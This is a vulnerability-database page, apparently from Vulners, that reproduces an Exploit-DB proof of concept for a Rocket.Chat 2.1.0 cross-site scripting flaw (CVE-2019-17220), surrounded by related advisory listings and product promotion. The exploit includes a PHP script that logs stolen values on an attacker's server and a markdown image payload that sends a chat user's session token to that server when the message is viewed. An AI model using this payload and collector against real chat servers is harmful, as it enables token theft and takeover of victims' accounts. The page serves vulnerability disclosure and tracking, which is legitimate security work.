Lucene search
K

Rocket.Chat 2.1.0 - Cross-Site Scripting

🗓️ 23 Oct 2019 00:00:00Reported by 3H34NType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 274 Views

Rocket.Chat 2.1.0 - Cross-Site Scripting vulnerability with Po

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability
23 Oct 201900:00
zdt
CNVD
Rocket.Chat Cross-Site Scripting Vulnerability (CNVD-2019-36863)
21 Oct 201900:00
cnvd
CVE
CVE-2019-17220
21 Oct 201920:12
cve
Cvelist
CVE-2019-17220
21 Oct 201920:12
cvelist
EUVD
EUVD-2019-7640
7 Oct 202500:30
euvd
exploitpack
Rocket.Chat 2.1.0 - Cross-Site Scripting
23 Oct 201900:00
exploitpack
NVD
CVE-2019-17220
21 Oct 201921:15
nvd
Packet Storm
Rocket.Chat 2.1.0 Cross Site Scripting
23 Oct 201900:00
packetstorm
Prion
Design/Logic Flaw
21 Oct 201921:15
prion
RedhatCVE
CVE-2019-17220
22 May 202510:02
redhatcve
Rows per page
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2019 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.0193
274